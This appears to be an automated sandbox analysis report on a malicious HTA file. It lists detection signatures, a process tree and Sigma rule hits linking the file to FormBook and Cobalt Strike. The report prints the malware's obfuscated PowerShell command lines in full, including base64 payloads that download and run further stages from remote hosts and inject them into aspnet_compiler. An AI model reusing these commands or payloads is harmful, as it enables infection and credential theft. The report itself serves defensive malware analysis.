Windows Analysis Report
bestimylover.hta

Overview

General Information

Sample name: bestimylover.hta
Analysis ID: 1568211
MD5: a61aacd5049328c9b8e3460d53e943ad
SHA1: ea66f697d5e07baf7dd6a4ab9d500688316b73fd
SHA256: c9d68c4787494badf47161637edf290f9297f8d66bb64fbc307fc7a978980509
Tags: hta, user-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 4080 cmdline: mshta.exe "C:\Users\user\Desktop\bestimylover.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 3532 cmdline: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6772 cmdline: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 6340 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 3780 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • aspnet_compiler.exe (PID: 7380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
            • aspnet_compiler.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • HDLzkMKGEKBh.exe (PID: 2856 cmdline: "C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • msinfo32.exe (PID: 7604 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)
                  • HDLzkMKGEKBh.exe (PID: 60 cmdline: "C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 7908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| bestimylover.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security | |
| 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 12.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 12.2.aspnet_compiler.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| amsi32_6364.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| amsi32_6364.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJ
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZ
WFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , ProcessId: 3780, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , ProcessId: 3780, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScs
JyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6364, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7380, ProcessName: aspnet_compiler.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", ProcessId: 6884, ProcessName: csc.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6772, TargetFilename: C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , ProcessId: 3780, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6772, TargetFilename: C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline
